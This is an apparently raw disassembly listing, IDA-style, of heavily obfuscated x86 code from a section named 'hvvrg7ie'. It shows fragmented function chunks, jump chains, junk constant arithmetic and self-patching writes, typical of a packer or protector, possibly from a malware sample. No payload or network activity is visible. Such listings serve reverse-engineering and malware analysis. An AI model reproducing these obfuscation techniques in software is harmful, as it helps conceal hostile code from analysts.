; FUNCTION CHUNK AT 0043DC6A SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0043FD41 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044083A SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00442948 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044348D SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004438C5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443F9A SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00446626 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446735 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004481A7 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00448D25 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 00450880 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00453DAA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00456A01 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045993A SIZE 0000000B BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	ecx
		pushf
		push	1C011FD6h
		jmp	loc_446626
sub_440AD9	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4544DD

loc_440AE9:				; CODE XREF: sub_4544DD:loc_43945Aj
		jz	loc_4559E2
		jmp	loc_444BC6
; END OF FUNCTION CHUNK	FOR sub_4544DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448100

loc_440AF4:				; CODE XREF: sub_448100:loc_442853j
		jnz	loc_44CFDD
		jmp	loc_452936
; END OF FUNCTION CHUNK	FOR sub_448100
; ---------------------------------------------------------------------------
		mov	ds:dword_41D120, eax
		lea	eax, nullsub_493
		mov	byte ptr [eax],	0C3h
		jmp	loc_445719

; =============== S U B	R O U T	I N E =======================================



sub_440B13	proc near		; CODE XREF: sub_40C6EC+191p
					; hvvrg7ie:0044E396j
					; DATA XREF: ...

var_C		= dword	ptr -0Ch

; FUNCTION CHUNK AT 00447257 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004478B8 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044BDF7 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0045998D SIZE 0000001D BYTES

		push	ecx
		push	0DF6AAF4Ah

loc_440B19:				; CODE XREF: sub_43D16B:loc_4555A9j
		jmp	loc_447257
sub_440B13	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_498. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4466A4

loc_440B1F:				; CODE XREF: sub_4466A4+DEC0j
		jmp	loc_44CC74
; END OF FUNCTION CHUNK	FOR sub_4466A4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D5FD

loc_440B24:				; CODE XREF: sub_43D5FD:loc_4561BCj
		call	sub_44973C
		mov	eax, 0EA3AEDBCh
		push	ecx
		push	37BA1832h
		jmp	loc_4541B9
; END OF FUNCTION CHUNK	FOR sub_43D5FD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_306. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_440B3A:				; CODE XREF: hvvrg7ie:0043C230j
		jmp	loc_45656F
; ---------------------------------------------------------------------------
		call	sub_446F26
; START	OF FUNCTION CHUNK FOR sub_44543A

loc_440B44:				; CODE XREF: sub_44543A+F5Aj
		jmp	loc_458132
; END OF FUNCTION CHUNK	FOR sub_44543A
; ---------------------------------------------------------------------------

loc_440B49:				; CODE XREF: hvvrg7ie:0043F222j
		jmp	loc_43EF67
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_440B4E:				; CODE XREF: sub_442FD1-7ABCj
		add	eax, edx
		jmp	loc_448721
; END OF FUNCTION CHUNK	FOR sub_442FD1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B851

loc_440B55:				; CODE XREF: sub_43B851:loc_43DEDCj
		jz	loc_44C76E
		xor	ebx, 164C31E1h
		sbb	ebp, esi
		jmp	loc_44C76C
; END OF FUNCTION CHUNK	FOR sub_43B851
; ---------------------------------------------------------------------------

loc_440B68:				; CODE XREF: hvvrg7ie:004541F8j
		xchg	edx, [esp]
		mov	eax, edx
		pop	edx
; START	OF FUNCTION CHUNK FOR sub_44059F

loc_440B6E:				; CODE XREF: sub_44059F:loc_44BB1Fj
		pop	ebx
		xchg	edx, [esp+0]
		mov	ecx, edx
		pop	edx
		jmp	loc_4418EB
; END OF FUNCTION CHUNK	FOR sub_44059F

; =============== S U B	R O U T	I N E =======================================



sub_440B7A	proc near		; DATA XREF: sub_45493B-9B3Fo

; FUNCTION CHUNK AT 0044B7EA SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045A3A7 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		jmp	loc_45A3A7
sub_440B7A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	ds:dword_41D010, eax
; START	OF FUNCTION CHUNK FOR sub_446B4C

loc_440B88:				; CODE XREF: sub_446B4C:loc_441211j
		lea	eax, nullsub_21
		mov	byte ptr [eax],	0C3h
		jmp	loc_43E91D
; END OF FUNCTION CHUNK	FOR sub_446B4C

; =============== S U B	R O U T	I N E =======================================



sub_440B96	proc near		; CODE XREF: sub_41A025+53p
					; sub_41A025+8Ep ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C271 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DE97 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457794 SIZE 00000008 BYTES

		push	edx
		push	283453C8h
		pop	edx
		or	edx, 642C82A1h
		add	edx, 9406EE7Dh
		jmp	loc_44DE97
sub_440B96	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_440BAE:				; CODE XREF: hvvrg7ie:00453A0Aj
		mov	eax, [esp]
		push	edx
		push	edi
		push	0DE11BED8h
		xchg	ebp, [esp]
		mov	edi, ebp

loc_440BBD:				; CODE XREF: hvvrg7ie:00449B30j
		pop	ebp
		sub	edi, 6E2A0066h
		jmp	loc_4583C6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44524C

loc_440BC9:				; CODE XREF: sub_44524C:loc_45477Fj
		mov	esi, ecx

loc_440BCB:				; CODE XREF: hvvrg7ie:loc_45A041j
		pop	ecx
		retn
; END OF FUNCTION CHUNK	FOR sub_44524C
; ---------------------------------------------------------------------------

loc_440BCD:				; CODE XREF: hvvrg7ie:004568E5j
		jmp	loc_45A3C0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448663

loc_440BD2:				; CODE XREF: sub_448663+8ACCj
		jmp	loc_43B72E
; END OF FUNCTION CHUNK	FOR sub_448663
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B6A5

loc_440BD7:				; CODE XREF: sub_43B6A5+1AA3Bj
		rol	eax, 0Eh
		push	edx
		mov	edx, eax
		jmp	loc_447875
; END OF FUNCTION CHUNK	FOR sub_43B6A5

; =============== S U B	R O U T	I N E =======================================



sub_440BE2	proc near		; DATA XREF: sub_443802+10o

; FUNCTION CHUNK AT 00455E39 SIZE 00000005 BYTES

		add	ebx, 0AA5458A1h
		xchg	ebx, [esp+0]
		jmp	loc_455E39
sub_440BE2	endp


; =============== S U B	R O U T	I N E =======================================



sub_440BF0	proc near		; CODE XREF: sub_41A40D+1Ep
					; sub_440BF0+5j
					; DATA XREF: ...
		call	sub_440C05
		jmp	ds:off_41D044
sub_440BF0	endp

; ---------------------------------------------------------------------------

loc_440BFB:				; CODE XREF: hvvrg7ie:00453DA5j
		jmp	loc_440501
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4533F2

loc_440C00:				; CODE XREF: sub_4533F2-4D94j
		jmp	sub_458D36
; END OF FUNCTION CHUNK	FOR sub_4533F2

; =============== S U B	R O U T	I N E =======================================



sub_440C05	proc near		; CODE XREF: sub_440BF0p
					; sub_4595E4-F6C5j ...

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004392DA SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00439B1E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043A02F SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0043B3E0 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0043BAD1 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0043C082 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043CE08 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D9AB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043DCFE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E6EA SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043FA17 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441631 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443C12 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00444C64 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00446AFB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449F24 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044CAE9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D871 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DE20 SIZE 0000002A BYTES
; FUNCTION CHUNK AT 0044E55E SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0044F418 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045316B SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0045328E SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00453EB0 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0045514A SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0045537C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455662 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045566F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455958 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004562E7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459EB0 SIZE 0000000A BYTES

		jns	loc_449F24
		xchg	ebx, [esp-4+arg_0]
		mov	edx, ebx
		call	sub_4595E4

loc_440C15:				; DATA XREF: sub_452F0E-14D31o
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_43C082
		jmp	loc_439B1E
sub_440C05	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439990

loc_440C29:				; CODE XREF: sub_439990+B06j
		mov	ebp, edx
		xchg	ebp, [esp-4+arg_0]
		push	ecx
		push	86D71049h
		jmp	loc_4420D3
; END OF FUNCTION CHUNK	FOR sub_439990
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44370F

loc_440C39:				; CODE XREF: sub_44370F-86B5j
		jz	loc_444FC6

loc_440C3F:				; CODE XREF: sub_44E34F-12742j
		jmp	loc_453419
; END OF FUNCTION CHUNK	FOR sub_44370F
; ---------------------------------------------------------------------------
		jns	loc_445237
		sbb	esi, eax
		mov	esi, [edi]
		jmp	loc_444FC6
; ---------------------------------------------------------------------------

loc_440C53:				; CODE XREF: hvvrg7ie:0043D9D8j
		jp	loc_455531
		ror	ebp, 0Bh
		jmp	loc_43C639

; =============== S U B	R O U T	I N E =======================================



sub_440C61	proc near		; CODE XREF: sub_43EB47:loc_441C00p
					; hvvrg7ie:0044CEEBj

; FUNCTION CHUNK AT 0043B81B SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043F3F4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004461DD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446911 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004506DA SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004544C7 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00455760 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00459368 SIZE 00000014 BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	19D6FF83h
		pop	eax
		sub	eax, 1F7FF091h
		and	eax, ds:4000F5h
		or	eax, 11DB95EFh
		jmp	loc_43F3F4
sub_440C61	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44616F

loc_440C82:				; CODE XREF: sub_44616F-66AEj
		jz	loc_4410F6

loc_440C88:				; CODE XREF: sub_456AC9-6E1Dj
		jmp	loc_45987E
; END OF FUNCTION CHUNK	FOR sub_44616F
; ---------------------------------------------------------------------------
		test	edi, esi
		jmp	loc_43D88A
; ---------------------------------------------------------------------------

loc_440C94:				; DATA XREF: sub_457774-10367o
		call	sub_450C5A
		push	edx
		push	0EFA3C289h
		pop	edx
		xor	edx, 0B61788Ah
		sub	edx, 0D8FA0653h
		add	edx, 504B0E59h
		or	edx, 35FBA563h
		jmp	loc_44E136
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_311. PRESS KEYPAD	"+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_283. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		test	edi, edx
; START	OF FUNCTION CHUNK FOR sub_444BE1

loc_440CC1:				; CODE XREF: sub_444BE1:loc_441A63j
		jmp	loc_43EB3E
; END OF FUNCTION CHUNK	FOR sub_444BE1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B048

loc_440CC6:				; CODE XREF: sub_45B048:loc_44A30Dj
		test	eax, 1
		jz	loc_458ADD
		jmp	loc_44DBC1
; END OF FUNCTION CHUNK	FOR sub_45B048
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450246

loc_440CD6:				; CODE XREF: sub_450246-B32Aj
		jno	loc_43EEE8
		jmp	loc_459F78
; END OF FUNCTION CHUNK	FOR sub_450246
; ---------------------------------------------------------------------------
		mov	[edi], ebp
		jmp	sub_43DC31
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B524

loc_440CE8:				; CODE XREF: sub_44B524:loc_4463B8j
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_44B524
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439B29

loc_440CEA:				; CODE XREF: sub_439B29+1C067j
		jmp	loc_440626
; END OF FUNCTION CHUNK	FOR sub_439B29
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44081B

loc_440CEF:				; CODE XREF: sub_44081B+FD70j
		jmp	nullsub_61
; END OF FUNCTION CHUNK	FOR sub_44081B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BCAE

loc_440CF4:				; CODE XREF: sub_44BCAE-B4E3j
		jmp	nullsub_93
; END OF FUNCTION CHUNK	FOR sub_44BCAE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450D8D

loc_440CF9:				; CODE XREF: sub_450D8D-466Bj
		cmp	dword ptr [ebp-10h], 1
; END OF FUNCTION CHUNK	FOR sub_450D8D
; START	OF FUNCTION CHUNK FOR sub_43D531

loc_440CFD:				; CODE XREF: sub_43D531:loc_455163j
		call	sub_452585
; END OF FUNCTION CHUNK	FOR sub_43D531
; START	OF FUNCTION CHUNK FOR sub_43D16B

loc_440D02:				; CODE XREF: sub_43D16B+7j
		jmp	loc_44222D
; END OF FUNCTION CHUNK	FOR sub_43D16B
; ---------------------------------------------------------------------------

loc_440D07:				; CODE XREF: hvvrg7ie:00446DF7j
		push	13A97F7Ah

; =============== S U B	R O U T	I N E =======================================



sub_440D0C	proc near		; CODE XREF: hvvrg7ie:loc_454CD6p
		xchg	eax, [esp+0]
		pop	eax
		push	49D765C8h
		pop	ebx
		sub	ebx, 48CECA56h
		add	ebx, 0FF3B5727h
		jmp	loc_448E33
sub_440D0C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446EC2

loc_440D27:				; CODE XREF: sub_446EC2:loc_43DDE6j
					; sub_446EC2+1213j
		add	ebx, 80437509h
		xchg	ebx, [esp+0]
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_446EC2
; ---------------------------------------------------------------------------
		mov	edx, 0BD91ED44h
		call	sub_446A16
		push	eax
		ror	eax, 4
		jmp	loc_44787E
; ---------------------------------------------------------------------------

locret_440D48:				; CODE XREF: hvvrg7ie:loc_44720Fj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445DC4

loc_440D49:				; CODE XREF: sub_445DC4+3EC9j
		jmp	nullsub_200
; END OF FUNCTION CHUNK	FOR sub_445DC4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4426E2

loc_440D4E:				; CODE XREF: sub_4426E2+5E88j
		jmp	loc_44FFB1
; END OF FUNCTION CHUNK	FOR sub_4426E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B2AC

loc_440D53:				; CODE XREF: sub_45B2AC-1781Dj
		jmp	loc_44B707
; END OF FUNCTION CHUNK	FOR sub_45B2AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BCAE

loc_440D58:				; CODE XREF: sub_44BCAE+1312j
		jbe	loc_45015A
		adc	ebp, edi
		js	loc_43F1DC
		jmp	loc_455744
; END OF FUNCTION CHUNK	FOR sub_44BCAE
; ---------------------------------------------------------------------------
		or	edi, 0ECF1E6A2h
		jmp	loc_4480DA
; ---------------------------------------------------------------------------
		mov	eax, [esp]
		push	eax
		mov	eax, ecx
		call	sub_43C3CB

loc_440D81:				; CODE XREF: hvvrg7ie:0044B095j
		jmp	locret_449138
; ---------------------------------------------------------------------------

loc_440D86:				; CODE XREF: hvvrg7ie:0043BC91j
		jbe	loc_459461
		ror	eax, 0Fh

loc_440D8F:				; CODE XREF: hvvrg7ie:loc_446718j
					; hvvrg7ie:0044D59Ej
		xor	eax, 2561EAD4h
		add	eax, ebp
		add	eax, 40C9CC55h
		push	offset sub_44D149
		jmp	locret_43C189
; ---------------------------------------------------------------------------

loc_440DA7:				; DATA XREF: sub_452F78:loc_442208o
		rol	eax, 9
		push	ebp
		mov	ebp, eax
		push	offset sub_4592BB
		jmp	locret_458B06
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D1A3

loc_440DB7:				; CODE XREF: sub_43D1A3+Bj
		rol	esi, 8
		xor	esi, 2B6EC225h
		and	esi, 280E4975h
		sub	esi, 0A12EA01Ah
		add	esi, 816BE22Fh
		xchg	esi, [esp+0]
		jmp	loc_45828F
; END OF FUNCTION CHUNK	FOR sub_43D1A3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_440DDA:				; CODE XREF: sub_446D8D-A263j
		jb	loc_443C3E
		not	edi
		xchg	esi, edi
		jl	loc_44E745

loc_440DEA:				; CODE XREF: sub_446D8D:loc_442B02j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_455749
		jmp	loc_44CF1E
; END OF FUNCTION CHUNK	FOR sub_446D8D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453E08

loc_440DFB:				; CODE XREF: sub_453E08:loc_45B1D1j
		jz	loc_445B85
		jmp	loc_44DE7D
; END OF FUNCTION CHUNK	FOR sub_453E08
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44646D

loc_440E06:				; CODE XREF: sub_44646D+10021j
		jnz	loc_43ACD4
		jmp	loc_44DB8A
; END OF FUNCTION CHUNK	FOR sub_44646D
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------

loc_440E12:				; CODE XREF: hvvrg7ie:00446E1Aj
		jmp	loc_44152B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44934B

loc_440E17:				; CODE XREF: sub_44934Bj
		push	edx
		push	0A3FFFF36h
		pop	edx
		sub	edx, 2549B13Ah
		add	edx, 228A968Fh
		cmp	edx, 11AC88D1h
		jmp	loc_43D029
; END OF FUNCTION CHUNK	FOR sub_44934B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BFF5

loc_440E35:				; CODE XREF: sub_44BFF5:loc_4474DCj
		test	esi, edx
		jmp	loc_43BDAA
; END OF FUNCTION CHUNK	FOR sub_44BFF5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DF5A

loc_440E3C:				; CODE XREF: sub_44DF5A:loc_44DF65j
		push	edx
		push	edx
		push	15F60DE7h
		pop	edx
		or	edx, 13201B5Fh
		push	offset loc_43FCC9
		jmp	nullsub_342
; END OF FUNCTION CHUNK	FOR sub_44DF5A
; ---------------------------------------------------------------------------

loc_440E54:				; CODE XREF: hvvrg7ie:00459794j
		jns	loc_4405AF

; =============== S U B	R O U T	I N E =======================================



sub_440E5A	proc near		; CODE XREF: sub_44E533:loc_449628p

; FUNCTION CHUNK AT 004464F0 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00459693 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		mov	byte ptr [eax],	64h
		jmp	loc_459693
sub_440E5A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450BDE

loc_440E66:				; CODE XREF: sub_450BDE+DB3j
		jge	loc_43BB2C
; END OF FUNCTION CHUNK	FOR sub_450BDE
; START	OF FUNCTION CHUNK FOR sub_44E533

loc_440E6C:				; CODE XREF: sub_44E533-9756j
		jmp	loc_455CFA
; END OF FUNCTION CHUNK	FOR sub_44E533
; ---------------------------------------------------------------------------

loc_440E71:				; CODE XREF: hvvrg7ie:004428B6j
		jmp	sub_447DE4
; ---------------------------------------------------------------------------
		test	ebx, esi
; START	OF FUNCTION CHUNK FOR sub_448100

loc_440E78:				; CODE XREF: sub_448100:loc_43D7D9j
		jmp	loc_4496CE
; END OF FUNCTION CHUNK	FOR sub_448100
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_551. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_440E7E:				; CODE XREF: hvvrg7ie:loc_44C0CAj
		rol	esi, 11h
		xor	esi, 1FC41295h
		add	eax, esi
		xchg	ebp, [esp]
		mov	esi, ebp
		pop	ebp
; START	OF FUNCTION CHUNK FOR sub_449425

loc_440E8F:				; CODE XREF: sub_449425-58EAj
		xor	eax, 8ACC9A01h
		sub	eax, 4DC50F56h
		jmp	loc_4552E7
; END OF FUNCTION CHUNK	FOR sub_449425
; ---------------------------------------------------------------------------
		push	eax
		mov	eax, edi
		push	offset loc_44E94A
		jmp	locret_44D48B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4529EA

loc_440EAD:				; CODE XREF: sub_4529EA-351Bj
		jnz	loc_44A152
; END OF FUNCTION CHUNK	FOR sub_4529EA
; START	OF FUNCTION CHUNK FOR sub_4422A8

loc_440EB3:				; CODE XREF: sub_4422A8:loc_44C95Ej
		jno	loc_44312D
		lea	eax, [ebp-125h]
		push	offset loc_45912C
		jmp	nullsub_95
; END OF FUNCTION CHUNK	FOR sub_4422A8
; ---------------------------------------------------------------------------

loc_440EC9:				; CODE XREF: hvvrg7ie:loc_453FAAj
		push	330E8A95h
		pop	edx
		rol	edx, 5
		add	edx, 9620B798h
		cmp	edx, 0CFF8C6FFh
		jmp	loc_454210
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4529EA

loc_440EE3:				; CODE XREF: sub_4529EA:loc_45819Ej
		jz	loc_440EF1

loc_440EE9:				; CODE XREF: hvvrg7ie:00446A70j
		mov	eax, [ebp-0Ch]
		call	sub_43E7F3
; END OF FUNCTION CHUNK	FOR sub_4529EA
; START	OF FUNCTION CHUNK FOR sub_446A16

loc_440EF1:				; CODE XREF: sub_44A87E-D4D7j
					; sub_4563DC:loc_43F504j ...
		mov	eax, [ebp+var_C]
		jmp	loc_43E7EF
; END OF FUNCTION CHUNK	FOR sub_446A16
; ---------------------------------------------------------------------------

loc_440EF9:				; CODE XREF: hvvrg7ie:loc_44A82Dj
		xchg	edx, [esp]
		mov	ecx, edx
		pop	edx
		and	ecx, 75A1A3E3h
		sub	ecx, 60584C73h
		or	ecx, 53E01DDAh
		js	loc_44502E
; START	OF FUNCTION CHUNK FOR sub_444B29

loc_440F17:				; CODE XREF: sub_444B29+6580j
		jmp	loc_44465E
; END OF FUNCTION CHUNK	FOR sub_444B29
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C2EA

loc_440F1C:				; CODE XREF: sub_44C2EA:loc_44511Ej
		and	edi, 0D9878493h
		add	edi, 0A83E51EAh
		push	offset loc_44CF02
		jmp	nullsub_452
; END OF FUNCTION CHUNK	FOR sub_44C2EA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E3B3

loc_440F32:				; CODE XREF: sub_44E3B3-1186Cj
		jno	nullsub_160
		or	esi, 0E8CD4E53h
		jmp	loc_4452B7
; END OF FUNCTION CHUNK	FOR sub_44E3B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_440F43:				; CODE XREF: sub_454099:loc_4471BFj
		add	eax, ebp
		add	eax, 5C26F093h
		mov	eax, [eax]
		push	offset loc_448B5A
		jmp	loc_457E88
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451B45

loc_440F57:				; CODE XREF: sub_451B45+39FEj
		add	eax, ebp
		add	eax, 8DAB0E24h
		xor	edx, edx
		call	sub_456DE7
; END OF FUNCTION CHUNK	FOR sub_451B45
; START	OF FUNCTION CHUNK FOR sub_4500FA

loc_440F66:				; CODE XREF: sub_4500FA-151FBj
					; sub_453E08+228Bj
		push	1936323h

loc_440F6B:				; CODE XREF: hvvrg7ie:loc_441B20j
		pop	eax
		xor	eax, 48C34B4Bh
		add	eax, 0B6F3AE8Ch
		jmp	loc_44448F
; END OF FUNCTION CHUNK	FOR sub_4500FA
; ---------------------------------------------------------------------------
		mov	edx, 9E849D81h
		push	offset sub_444632
		jmp	loc_43FE91
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4495B9

loc_440F8C:				; CODE XREF: sub_4495B9-49DDj
		jge	loc_452F25

loc_440F92:				; CODE XREF: sub_4495B9:loc_43A442j
		push	40040B0Ch
		pop	eax
		rol	eax, 9
		xor	eax, 88E63587h
		call	sub_445E8E
; END OF FUNCTION CHUNK	FOR sub_4495B9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_112. PRESS KEYPAD	"+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_251. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_440FA8:				; CODE XREF: sub_4465A6+9BC0j
		jmp	loc_43CF11
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------

loc_440FAE:				; CODE XREF: hvvrg7ie:00440135j
		jmp	sub_4489AE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D47A

loc_440FB3:				; CODE XREF: sub_44D47A+277Dj
		ror	edx, 11h
		jmp	loc_452A8F
; END OF FUNCTION CHUNK	FOR sub_44D47A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449AD1

loc_440FBB:				; CODE XREF: sub_449AD1:loc_440A66j
					; sub_449AD1-9061j
		and	eax, 0C9E81F05h
		add	eax, 83DF8D24h
		push	ecx
		mov	ecx, esi
		xchg	ecx, [esp+8+var_8]
		push	0CE221002h
		jmp	loc_4465BE
; END OF FUNCTION CHUNK	FOR sub_449AD1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4557D4

loc_440FD7:				; CODE XREF: sub_4557D4:loc_43A95Dj
		jz	loc_454223
		jmp	loc_45ACB5
; END OF FUNCTION CHUNK	FOR sub_4557D4
; ---------------------------------------------------------------------------

loc_440FE2:				; CODE XREF: hvvrg7ie:0043926Bj
		js	loc_44BFA9
		add	esi, eax
		test	eax, 0C764AC24h
		jmp	loc_43BB6E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457A97

loc_440FF5:				; CODE XREF: sub_457A97-2A27j
		pop	edx
		and	edx, 6139F801h
		xor	edx, 59395839h
		sub	edx, 7CF80643h
		or	edx, 1D4911F7h
		add	edx, 20D7DE89h
		mov	[edx], eax
		jmp	loc_44C614
; END OF FUNCTION CHUNK	FOR sub_457A97
; ---------------------------------------------------------------------------
		cmp	esi, 4B89318Bh
		jmp	loc_43B355
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CEC8

loc_441026:				; CODE XREF: sub_44CEC8:loc_45A81Dj
		mov	edx, ecx
		jmp	loc_455AF9
; END OF FUNCTION CHUNK	FOR sub_44CEC8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451176

loc_44102D:				; CODE XREF: sub_451176:loc_43FB89j
		pop	eax
		rol	eax, 1Fh
		add	eax, 401D3564h
		xor	eax, 219B01F3h
		add	eax, 0AAC663E8h
		jmp	loc_44AA56
; END OF FUNCTION CHUNK	FOR sub_451176
; ---------------------------------------------------------------------------
